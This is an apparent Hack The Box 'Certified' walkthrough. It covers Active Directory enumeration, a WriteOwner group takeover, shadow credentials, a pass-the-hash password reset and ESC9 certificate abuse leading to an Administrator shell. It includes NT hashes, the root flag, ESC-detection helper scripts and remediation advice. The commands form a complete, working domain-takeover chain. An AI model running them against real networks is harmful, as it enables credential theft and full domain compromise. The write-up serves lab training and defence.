As is common in Windows pentests, you will start the Certified box with credentials for the following account: Username: judith.mader Password: judith09
Nmap Enumeration
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-19 11:44:23Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-19T11:45:52+00:00; +7h00m02s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-05-13T15:49:36
| Not valid after: 2025-05-13T15:49:36
| MD5: 4e1f:97f0:7c0a:d0ec:52e1:5f63:ec55:f3bc
|_SHA-1: 28e2:4c68:aa00:dd8b:ee91:564b:33fe:a345:116b:3828
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-19T11:45:52+00:00; +7h00m02s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-05-13T15:49:36
| Not valid after: 2025-05-13T15:49:36
| MD5: 4e1f:97f0:7c0a:d0ec:52e1:5f63:ec55:f3bc
|_SHA-1: 28e2:4c68:aa00:dd8b:ee91:564b:33fe:a345:116b:3828
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-19T11:45:52+00:00; +7h00m02s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-05-13T15:49:36
| Not valid after: 2025-05-13T15:49:36
| MD5: 4e1f:97f0:7c0a:d0ec:52e1:5f63:ec55:f3bc
|_SHA-1: 28e2:4c68:aa00:dd8b:ee91:564b:33fe:a345:116b:3828
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-05-13T15:49:36
| Not valid after: 2025-05-13T15:49:36
| MD5: 4e1f:97f0:7c0a:d0ec:52e1:5f63:ec55:f3bc
|_SHA-1: 28e2:4c68:aa00:dd8b:ee91:564b:33fe:a345:116b:3828
|_ssl-date: 2025-01-19T11:45:52+00:00; +7h00m02s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49682/tcp open msrpc Microsoft Windows RPC
49716/tcp open msrpc Microsoft Windows RPC
49740/tcp open msrpc Microsoft Windows RPC
49773/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
|_clock-skew: mean: 7h00m01s, deviation: 0s, median: 7h00m01s
| smb2-time:
|   date: 2025-01-19T11:45:12
|_  start_date: N/A
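The +7h clock-skew figure in the host script results is the first thing to act on: Kerberos, and therefore every certipy auth (PKINIT) step later in this writeup, rejects requests whose timestamp is more than five minutes off the KDC's clock. The Python below is an added example, not part of the original writeup and not Nmap's or Certipy's code. It pulls the offset out of the clock-skew and ssl-date lines (the sample is the scan output above, embedded as a constructed string), says whether a default-configured KDC will accept it, and prints the relative offset to hand to libfaketime; that you have libfaketime installed is an assumption, and ntpdate against the DC works just as well.

```python
import re

# Constructed sample: the two skew-bearing lines from the Nmap scan above.
NMAP_SAMPLE = """\
|_ssl-date: 2025-01-19T11:45:52+00:00; +7h00m02s from scanner time.
|_clock-skew: mean: 7h00m01s, deviation: 0s, median: 7h00m01s
"""

KERBEROS_MAX_SKEW = 300  # seconds: the KDC default MaxClockSkew is 5 minutes

_DURATION = re.compile(r"([+-]?)(?:(\d+)d)?(?:(\d+)h)?(?:(\d+)m)?(?:(\d+)s)?")


def parse_duration(text):
    """Turn an Nmap duration such as '+7h00m02s', '-30s' or '1d2h' into signed seconds."""
    m = _DURATION.fullmatch(text.strip())
    if not m or not any(m.group(i) for i in range(2, 6)):
        raise ValueError(f"not an nmap duration: {text!r}")
    sign = -1 if m.group(1) == "-" else 1
    days, hours, minutes, seconds = (int(x or 0) for x in m.groups()[1:])
    return sign * (days * 86400 + hours * 3600 + minutes * 60 + seconds)


def skew_from_nmap(output):
    """Target clock minus scanner clock, in seconds (positive = target is ahead).

    Prefers the clock-skew host script (median over all samples) and falls back
    to the ssl-date line from a single TLS handshake. Returns None if neither is present.
    """
    m = re.search(r"clock-skew:.*?median:\s*(\S+)", output)
    if not m:
        m = re.search(r"ssl-date:.*?;\s*(\S+) from scanner time", output)
    if not m:
        return None
    return parse_duration(m.group(1).rstrip(".,"))


def kerberos_accepts(skew_seconds):
    """True if a KDC with the default 5-minute tolerance would accept our timestamps."""
    return abs(skew_seconds) <= KERBEROS_MAX_SKEW


def faketime_offset(skew_seconds):
    """Relative offset for libfaketime; a bare number is interpreted as seconds ('+25201')."""
    return f"{'+' if skew_seconds >= 0 else '-'}{abs(skew_seconds)}"


if __name__ == "__main__":
    skew = skew_from_nmap(NMAP_SAMPLE)
    print(f"target clock offset: {skew:+d} s")
    if not kerberos_accepts(skew):
        print("Kerberos will reject us: run e.g. "
              f"faketime '{faketime_offset(skew)}' certipy-ad auth -pfx ... "
              "or sync the clock with ntpdate -u 10.10.11.41")
```

The clock-skew script is preferred over ssl-date because it is a median over several protocols (SMB2, TLS, Kerberos), whereas ssl-date comes from one handshake and drifts by a second or two between ports, as the scan above shows.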
USERS
USERNAME | PASSWORD / NT HASH | GROUPS | HOW OBTAINED
---|---|---|---
judith.mader | judith09 | | given at the start
gregory.cameron | | | enumerated only
alexander.huges | | | enumerated only
ca_operator | aad3b435b51404eeaad3b435b51404ee:fb54d1c05e301e024800c6ad99fe9b45 (password reset to newP@ssword2022 during the attack) | | certificate authentication after the password reset via management_svc
management_svc | a091c1832bcdd4677c28b5a6a1295584 | Management, RDP | shadow credentials after the WriteOwner takeover of Management
Administrator | aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34 | | ESC9 certificate issued with UPN "administrator"
LDAP dump
┌──(jimmy㉿kali)-[~/HTB/rooms/certified/ldapdomain]
└─$ ldapdomaindump ldaps://10.10.11.41 -u 'certified.htb\judith.mader' -p 'judith09'
Bloodhound domain dump
┌──(jimmy㉿kali)-[~/HTB/rooms/certified/ldapdomain]
└─$ sudo bloodhound-python -d certified.htb -u judith.mader -p 'judith09' -ns 10.10.11.41 -c all
SMB Share Enumeration
┌──(jimmy㉿kali)-[~/HTB/rooms/certified]
└─$ crackmapexec smb certified.htb -u 'judith.mader' -d certified.htb -p 'judith09' --shares
SMB certified.htb 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB certified.htb 445 DC01 [+] certified.htb\judith.mader:judith09
SMB certified.htb 445 DC01 [+] Enumerated shares
SMB certified.htb 445 DC01 Share Permissions Remark
SMB certified.htb 445 DC01 ----- ----------- ------
SMB certified.htb 445 DC01 ADMIN$ Remote Admin
SMB certified.htb 445 DC01 C$ Default share
SMB certified.htb 445 DC01 IPC$ READ Remote IPC
SMB certified.htb 445 DC01 NETLOGON READ Logon server share
SMB certified.htb 445 DC01 SYSVOL READ Logon server share
WriteOwner takeover
BloodHound shows judith.mader holding WriteOwner over the Management group. Taking ownership lets her grant herself WriteMembers on the group's DACL and then add herself to it, picking up whatever rights the group has; the shadow-credentials step below only works because Management can write to management_svc.
bloodyAD --host "10.10.11.41" -d "certified.htb" -u "judith.mader" -p "judith09" set owner Management judith.mader
dacledit.py -action 'write' -rights 'WriteMembers' -principal 'judith.mader' -target-dn 'CN=MANAGEMENT,CN=USERS,DC=CERTIFIED,DC=HTB' 'certified.htb'/'judith.mader':'judith09'
net rpc group addmem "Management" "judith.mader" -U "certified.htb"/"judith.mader"%"judith09" -S "certified.htb"
Check the membership before going on (the new group SID only shows up in sessions and tickets created after the change):
net rpc group members "Management" -U "certified.htb"/"judith.mader"%"judith09" -S "certified.htb"
Obtained hash for management_svc
Shadow credentials: certipy adds a Key Credential to management_svc's msDS-KeyCredentialLink, authenticates with it via PKINIT to get a TGT and the account's NT hash, then restores the attribute's original value:
certipy-ad shadow auto -u '[email protected]' -p 'judith09' -account 'management_svc' -dc-ip '10.10.11.41'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'management_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'e33cc8ec-7bc7-ea3b-3c5a-0b2299ffb526'
[*] Adding Key Credential with device ID 'e33cc8ec-7bc7-ea3b-3c5a-0b2299ffb526' to the Key Credentials for 'management_svc'
[*] Successfully added Key Credential with device ID 'e33cc8ec-7bc7-ea3b-3c5a-0b2299ffb526' to the Key Credentials for 'management_svc'
[*] Authenticating as 'management_svc' with the certificate
[*] Using principal: [email protected]
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'management_svc.ccache'
[*] Trying to retrieve NT hash for 'management_svc'
[*] Restoring the old Key Credentials for 'management_svc'
[*] Successfully restored the old Key Credentials for 'management_svc'
[*] NT hash for 'management_svc': a091c1832bcdd4677c28b5a6a1295584
Ran Certify.exe as management_svc over WinRM to find vulnerable templates. CertifiedAuthentication has the Client Authentication EKU, needs no manager approval or co-signatures, and is enrollable by ca_operator; its NO_SECURITY_EXTENSION flag means issued certificates carry no szOID_NTDS_CA_SECURITY_EXT (object SID) extension, so a KDC that is not in full enforcement mode maps the certificate to an account by UPN alone. That is ESC9, and it needs a principal who can enroll plus the ability to rewrite that principal's UPN, which management_svc's GenericAll over ca_operator provides.
*Evil-WinRM* PS C:\Users\management_svc\Documents> ./Certify.exe find /vuln /domain:certified.htb
    CA Name                               : DC01.certified.htb\certified-DC01-CA
    Template Name                         : CertifiedAuthentication
    Schema Version                        : 2
    Validity Period                       : 1000 years
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag           : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
    mspki-enrollment-flag                 : PUBLISH_TO_DS, AUTO_ENROLLMENT, NO_SECURITY_EXTENSION
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Server Authentication
    mspki-certificate-application-policy  : Client Authentication, Server Authentication
    Permissions
      Enrollment Permissions
        Enrollment Rights           : CERTIFIED\ca_operator          S-1-5-21-729746778-2675978091-3820388244-1106
                                      CERTIFIED\Domain Admins        S-1-5-21-729746778-2675978091-3820388244-512
                                      CERTIFIED\Enterprise Admins    S-1-5-21-729746778-2675978091-3820388244-519
        AutoEnrollment Rights       : CERTIFIED\ca_operator          S-1-5-21-729746778-2675978091-3820388244-1106
      Object Control Permissions
        Owner                       : CERTIFIED\Administrator        S-1-5-21-729746778-2675978091-3820388244-500
        WriteOwner Principals       : CERTIFIED\Administrator        S-1-5-21-729746778-2675978091-3820388244-500
                                      CERTIFIED\Domain Admins        S-1-5-21-729746778-2675978091-3820388244-512
                                      CERTIFIED\Enterprise Admins    S-1-5-21-729746778-2675978091-3820388244-519
        WriteDacl Principals        : CERTIFIED\Administrator        S-1-5-21-729746778-2675978091-3820388244-500
                                      CERTIFIED\Domain Admins        S-1-5-21-729746778-2675978091-3820388244-512
                                      CERTIFIED\Enterprise Admins    S-1-5-21-729746778-2675978091-3820388244-519
        WriteProperty Principals    : CERTIFIED\Administrator        S-1-5-21-729746778-2675978091-3820388244-500
                                      CERTIFIED\Domain Admins        S-1-5-21-729746778-2675978091-3820388244-512
                                      CERTIFIED\Enterprise Admins    S-1-5-21-729746778-2675978091-3820388244-519
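Reading ESC classes off a Certify dump by hand is error-prone, so here is an added example (my code, not Certify's or Certipy's) that parses the template block above (embedded as a constructed sample) and applies the template-side conditions: an enroller outside the admin groups, no manager approval, no required signatures, and then ENROLLEE_SUPPLIES_SUBJECT for ESC1, Any Purpose or no EKU for ESC2, NO_SECURITY_EXTENSION for ESC9. It deliberately goes one step beyond the page's single template by reporting the ESC1 and ESC2 cases too, and the test flips the flags to show that. What it cannot see is the DC-side StrongCertificateBindingEnforcement value; ESC9 is only exploitable while that is below 2.

```python
import re

# Constructed sample: the CertifiedAuthentication block from the Certify output above.
CERTIFY_SAMPLE = r"""
CA Name : DC01.certified.htb\certified-DC01-CA
Template Name : CertifiedAuthentication
Schema Version : 2
Validity Period : 1000 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : PUBLISH_TO_DS, AUTO_ENROLLMENT, NO_SECURITY_EXTENSION
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Server Authentication
mspki-certificate-application-policy : Client Authentication, Server Authentication
Permissions
Enrollment Permissions
Enrollment Rights : CERTIFIED\ca_operator S-1-5-21-729746778-2675978091-3820388244-1106
CERTIFIED\Domain Admins S-1-5-21-729746778-2675978091-3820388244-512
CERTIFIED\Enterprise Admins S-1-5-21-729746778-2675978091-3820388244-519
AutoEnrollment Rights : CERTIFIED\ca_operator S-1-5-21-729746778-2675978091-3820388244-1106
Object Control Permissions
Owner : CERTIFIED\Administrator S-1-5-21-729746778-2675978091-3820388244-500
"""

# RIDs treated as "already privileged": Administrator, Domain Admins, Enterprise Admins.
PRIVILEGED_RIDS = {"500", "512", "519"}
# EKUs that let a certificate be used for domain authentication (no EKU at all also counts).
AUTH_EKUS = {"Client Authentication", "Smart Card Logon", "PKINIT Client Authentication", "Any Purpose"}

_PRINCIPAL = re.compile(r"^(.+?)\s+(S-1-\d+(?:-\d+)+)\s*$")


def parse_template(text):
    """Collapse Certify's 'Key : Value' block into {lower-case key: [values]}.
    Lines without ' : ' that look like 'DOMAIN\\name SID' continue the previous rights list."""
    fields, last = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if " : " in line:
            key, _, value = line.partition(" : ")
            last = key.strip().lower()
            fields[last] = [value.strip()]
        elif last and _PRINCIPAL.match(line):
            fields[last].append(line)
        # anything else ("Permissions", blank lines) is a section header and is skipped
    return fields


def flags(fields, key):
    """Comma-separated flag/EKU list for one key, as a set."""
    return {f.strip() for f in ",".join(fields.get(key, [])).split(",") if f.strip()}


def enrollers(fields):
    """(name, SID) pairs with enrollment rights whose RID is not an admin RID."""
    out = []
    for entry in fields.get("enrollment rights", []):
        m = _PRINCIPAL.match(entry)
        if m and m.group(2).rsplit("-", 1)[-1] not in PRIVILEGED_RIDS:
            out.append((m.group(1), m.group(2)))
    return out


def assess(fields):
    """Return [(ESC class, reason)] for the conditions visible in the template itself."""
    name_flags = flags(fields, "mspki-certificate-name-flag")
    enroll_flags = flags(fields, "mspki-enrollment-flag")
    ekus = flags(fields, "pkiextendedkeyusage")
    signatures = int(fields.get("authorized signatures required", ["0"])[0])
    low_priv = [name for name, _ in enrollers(fields)]
    auth_capable = not ekus or bool(ekus & AUTH_EKUS)

    findings = []
    if not low_priv or "PEND_ALL_REQUESTS" in enroll_flags or signatures > 0:
        return findings  # needs an admin, manager approval or a co-signer: not unattended
    if auth_capable and "ENROLLEE_SUPPLIES_SUBJECT" in name_flags:
        findings.append(("ESC1", f"{low_priv} can enroll and choose the SAN"))
    if not ekus or "Any Purpose" in ekus:
        findings.append(("ESC2", f"{low_priv} can enroll for Any Purpose / no EKU"))
    if auth_capable and "NO_SECURITY_EXTENSION" in enroll_flags:
        findings.append(("ESC9", f"{low_priv} can enroll; no szOID_NTDS_CA_SECURITY_EXT, "
                                 "so the KDC maps by UPN while StrongCertificateBindingEnforcement < 2"))
    return findings


if __name__ == "__main__":
    template = parse_template(CERTIFY_SAMPLE)
    for esc, why in assess(template):
        print(f"{template['template name'][0]}: {esc} - {why}")
```

Feed it the whole Certify output split on blank lines and you get one verdict per template; the enroller check is the one that matters most in practice, since a template that only Domain Admins can enroll in is not an escalation path however badly it is flagged.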
Exploited GenericAll over ca_operator: reset its password with management_svc's NT hash (pass-the-hash)
management_svc has GenericAll over ca_operator, so the quickest route is a password reset. It is destructive and noisy (the old password stops working and the DC logs a 4724 event); with GenericAll a shadow-credentials or targeted-Kerberoast approach would leave the password alone. The LM half of the hash is the usual all-f placeholder:
┌──(jimmy㉿kali)-[~/HTB/rooms/certified]
└─$ pth-net rpc password "ca_operator" "newP@ssword2022" -U "certified.htb"/"management_svc"%"ffffffffffffffffffffffffffffffff":"a091c1832bcdd4677c28b5a6a1295584" -S "certified.htb"
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
The DC is about seven hours ahead of the attacking host (see the nmap clock-skew output). Kerberos rejects more than five minutes of skew, so certificate (PKINIT) authentication fails until the local clock is adjusted. This attempt found no usable server:
┌──(jimmy㉿kali)-[~/HTB/rooms/certified]
└─$ sudo ntpdate -u dc01.certified.htb
ntpdig: no eligible servers
┌──(jimmy㉿kali)-[~/HTB/rooms/certified]
└─$ certipy-ad req -u ca_operator -p 'newP@ssword2022' -ca certified-DC01-CA -target certified.htb -dc-ip 10.10.11.41 -template CertifiedAuthentication -upn ca_operator@certified.htb -ns 10.10.11.41 -dns 10.10.11.41 -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)
/usr/lib/python3/dist-packages/certipy/commands/req.py:459: SyntaxWarning: invalid escape sequence '\('
  "(0x[a-zA-Z0-9]+) \([-]?[0-9]+ ",
[+] Trying to resolve 'certified.htb' at '10.10.11.41'
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.10.11.41[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.10.11.41[\pipe\cert]
[*] Successfully requested certificate
[*] Request ID is 19
[*] Got certificate with UPN 'ca_operator@certified.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'ca_operator.pfx'
CA_OPERATOR HASH
┌──(jimmy㉿kali)-[~/HTB/rooms/certified]
└─$ certipy-ad auth -pfx ca_operator.pfx -domain certified.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: ca_operator@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ca_operator.ccache'
[*] Trying to retrieve NT hash for 'ca_operator'
[*] Got hash for 'ca_operator@certified.htb': aad3b435b51404eeaad3b435b51404ee:fb54d1c05e301e024800c6ad99fe9b45
Set ca_operator's UPN to "administrator" (ESC9, using management_svc's GenericAll)
The UPN is set to the bare value administrator rather than administrator@certified.htb, as in Certipy's ESC9 walkthrough, which uses the bare name to avoid a UPN-uniqueness conflict while still letting the KDC map the certificate to the Administrator account. The change is logged as a 4738 (user account changed) event and should be reverted afterwards with the same command and -upn ca_operator@certified.htb.
┌──(jimmy㉿kali)-[~/HTB/rooms/certified]
└─$ certipy-ad account update -username management_svc@certified.htb -hashes a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn administrator
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_operator':
    userPrincipalName                   : Administrator
[*] Successfully updated 'ca_operator'
With ca_operator's UPN now "administrator", request a certificate from the same template again as ca_operator
No -upn argument is needed: SUBJECT_ALT_REQUIRE_UPN makes the CA build the SAN from the account's own userPrincipalName (a requester-supplied SAN is ignored unless ENROLLEE_SUPPLIES_SUBJECT is set), so the certificate comes back with UPN "administrator" and, because of NO_SECURITY_EXTENSION, without a SID. The request below was run from a second (Pwnbox) session:
┌─[us-vip-1]─[10.10.14.7]─[cb32@htb-juaup7drow]─[~/certified.htb]
└──╼ [★]$ certipy req -username [email protected] -p newP@ssword2022 -ca certified-DC01-CA -template CertifiedAuthentication -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[+] Trying to resolve 'CERTIFIED.HTB' at '1.1.1.1'
[+] Resolved 'CERTIFIED.HTB' from cache: 10.10.11.41
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.10.11.41[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.10.11.41[\pipe\cert]
[*] Successfully requested certificate
[*] Request ID is 11
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
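Both certificate requests above end with "[*] Certificate has no object SID", and that line is the observable core of ESC9: because the template carries NO_SECURITY_EXTENSION, the CA omits the szOID_NTDS_CA_SECURITY_EXT (1.3.6.1.4.1.311.25.2) extension that a KB5014754-patched KDC would otherwise use to bind the certificate to an account SID, and while StrongCertificateBindingEnforcement is 0 or 1 it falls back to the SAN UPN, which the previous step pointed at Administrator. The Python below is an added example, not Certipy's or Microsoft's code: a tiny DER encoder/decoder builds stand-ins for the extension area of the two kinds of certificate (constructed, not real certificates; the SID is ca_operator's from the Certify output) and a checker reports the UPN, the SID and which binding the KDC would use. Point find_upn and find_object_sid at the DER of a real certificate (for example extracted from a .pfx with openssl) to check an issued one; the SID-extension tagging here matches what Certipy writes when it forges a certificate, and only the OIDs and the "S-1-5-..." string matter to the checks.

```python
import re

# DER encodings (tag 0x06, length, base-128 arcs) of the Microsoft OIDs involved.
OID_SECURITY_EXT = bytes.fromhex("06092b0601040182371902")    # 1.3.6.1.4.1.311.25.2   szOID_NTDS_CA_SECURITY_EXT
OID_OBJECTSID = bytes.fromhex("060a2b060104018237190201")     # 1.3.6.1.4.1.311.25.2.1 szOID_NTDS_OBJECTSID
OID_UPN = bytes.fromhex("060a2b060104018237140203")           # 1.3.6.1.4.1.311.20.2.3 szOID_NT_PRINCIPAL_NAME

_SID = re.compile(rb"S-1-5(?:-\d+)+")


def der(tag, body):
    """Encode one DER TLV with a definite (short or long form) length."""
    n = len(body)
    if n < 0x80:
        return bytes([tag, n]) + body
    length = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(length)]) + length + body


def read_tlv(buf, off=0):
    """Decode the TLV at buf[off:], returning (tag, body, offset_after)."""
    tag, n = buf[off], buf[off + 1]
    off += 2
    if n & 0x80:
        k = n & 0x7F
        n = int.from_bytes(buf[off:off + k], "big")
        off += k
    return tag, buf[off:off + n], off + n


def upn_other_name(upn):
    """SAN otherName: [0] { OID szOID_NT_PRINCIPAL_NAME, [0] EXPLICIT UTF8String upn }."""
    return der(0xA0, OID_UPN + der(0xA0, der(0x0C, upn.encode())))


def sid_extension(sid):
    """X.509 Extension { OID szOID_NTDS_CA_SECURITY_EXT, OCTET STRING {
         SEQUENCE { [0] { OID szOID_NTDS_OBJECTSID, [0] { OCTET STRING sid } } } } }
    (the layout Certipy writes; here a constructed stand-in)."""
    value = der(0x30, der(0xA0, OID_OBJECTSID + der(0xA0, der(0x04, sid.encode()))))
    return der(0x30, OID_SECURITY_EXT + der(0x04, value))


def find_upn(cert_der):
    """UPN from the SAN otherName, or None."""
    i = cert_der.find(OID_UPN)
    if i < 0:
        return None
    tag, body, _ = read_tlv(cert_der, i + len(OID_UPN))   # [0] EXPLICIT wrapper
    if tag != 0xA0:
        return None
    tag, body, _ = read_tlv(body)                           # the UTF8String inside it
    return body.decode() if tag == 0x0C else None


def find_object_sid(cert_der):
    """SID from szOID_NTDS_CA_SECURITY_EXT, or None when the extension is absent
    (Certipy's 'Certificate has no object SID'). Like Certipy, it just locates the
    'S-1-5-...' string after the extension OID rather than walking the full structure."""
    i = cert_der.find(OID_SECURITY_EXT)
    if i < 0:
        return None
    m = _SID.search(cert_der, i)
    return m.group(0).decode() if m else None


def kdc_binding(cert_der):
    """'strong' when the SID extension is present, 'weak-upn' when only a UPN is there
    (accepted by the KDC only while StrongCertificateBindingEnforcement is 0 or 1),
    None when the certificate names no account at all."""
    if find_object_sid(cert_der):
        return "strong"
    return "weak-upn" if find_upn(cert_der) else None


# Constructed stand-ins for the extension area of two certificates (not real certificates):
# what the CertifiedAuthentication template issues (UPN only) and what a template without
# NO_SECURITY_EXTENSION would issue for ca_operator (UPN plus SID from the Certify output).
ESC9_CERT = der(0x30, upn_other_name("administrator"))
NORMAL_CERT = der(0x30, upn_other_name("ca_operator@certified.htb")
                  + sid_extension("S-1-5-21-729746778-2675978091-3820388244-1106"))

if __name__ == "__main__":
    for label, cert in (("ESC9 certificate", ESC9_CERT), ("normal certificate", NORMAL_CERT)):
        print(f"{label}: UPN={find_upn(cert)!r} SID={find_object_sid(cert)!r} binding={kdc_binding(cert)}")
```

Setting StrongCertificateBindingEnforcement to 2 on the DCs turns the "weak-upn" case into a logon failure (KDC event 39/41), which is exactly the defensive fix for this template.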
Sync the clock before authenticating with the certificate
certipy auth does Kerberos PKINIT, and the KDC rejects requests whose timestamp is more than five minutes off its own clock (the DC is about 7 h ahead of the scanner in the nmap output). On the Pwnbox the author synced against 10.10.14.7, the box's own VPN address; syncing against the DC itself, sudo ntpdate -u 10.10.11.41, is the more direct choice.
┌─[us-vip-1]─[10.10.14.7]─[cb32@htb-juaup7drow]─[~/certified.htb]
└──╼ [★]$ sudo ntpdate -u 10.10.14.7
2025-01-23 02:21:02.10286 (-0600) -0.000022 +/- 0.000069 10.10.14.7 s3 no-leap
┌─[us-vip-1]─[10.10.14.7]─[cb32@htb-juaup7drow]─[~/certified.htb]
└──╼ [★]$ certipy auth -pfx administrator.pfx -domain certified.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@certified.htb': aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34
Connect to Administrator using WinRM
┌──(jimmy㉿kali)-[~/HTB/rooms/certified]
└─$ evil-winrm -i 10.10.11.41 -u 'administrator' -H '0d5b49608bbce1751f708748f67e2d34'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
0fc1e7b1b2ec1b4cec98a558934043a1
*Evil-WinRM* PS C:\Users\Administrator\Desktop> exit
Penetration Testing Report: Certified Box
Objective: To exploit Active Directory (AD) vulnerabilities in the “Certified” system and gain administrator-level access.
1. Initial Access
- Credentials for the “Judith Mader” account were provided:
- Username: judith.mader
- Password: judith09
- Nmap was used to enumerate open ports and services.
2. Enumeration
- LDAP and BloodHound:
- ldapdomaindump and bloodhound-python (collected as judith.mader) mapped the attack path: judith.mader has WriteOwner over the Management group, Management has write rights over management_svc, and management_svc has GenericAll over ca_operator.
- SMB Enumeration:
- Only the default shares were present (IPC$, NETLOGON and SYSVOL readable); nothing of use was found there.
3. Exploitation Steps
- WriteOwner privilege escalation:
- judith.mader took ownership of the Management group, granted herself WriteMembers on it and added herself to the group.
- Shadow credentials:
- Group membership gave write access to management_svc's msDS-KeyCredentialLink; certipy shadow auto added a Key Credential, authenticated with it and recovered management_svc's NT hash.
- Certificate services (ESC9):
- Certify found the CertifiedAuthentication template: Client Authentication EKU, no approval or signatures, enrollable by ca_operator, and flagged NO_SECURITY_EXTENSION, so issued certificates carry no SID.
- management_svc's GenericAll over ca_operator was used to reset ca_operator's password and then to set its UPN to "administrator".
- A certificate requested as ca_operator was issued with UPN "administrator" and no SID; the KDC mapped it to the Administrator account by UPN.
- Final administrator access:
- certipy auth used that certificate to obtain a TGT and Administrator's NT hash, and Evil-WinRM with the hash gave an administrative shell.
4. Key Findings
- Vulnerable certificate template:
- CertifiedAuthentication combines a client-authentication EKU, no manager approval, low-privileged enrollment (ca_operator) and NO_SECURITY_EXTENSION; with the KDC not in full enforcement mode this is ESC9.
- Excessive ACL rights:
- WriteOwner on a group, write rights on a service account and GenericAll on the enrolling account chained a plain domain user to Domain Admin without any credential reuse.
- Destructive actions went unblocked:
- A password reset, a UPN rewrite, DACL changes and certificate issuance all succeeded and, as far as the engagement could tell, went undetected.
5. Recommendations
- Remove NO_SECURITY_EXTENSION from CertifiedAuthentication and set StrongCertificateBindingEnforcement to 2 (full enforcement, KB5014754) on the domain controllers so that certificates without the SID extension are rejected for logon.
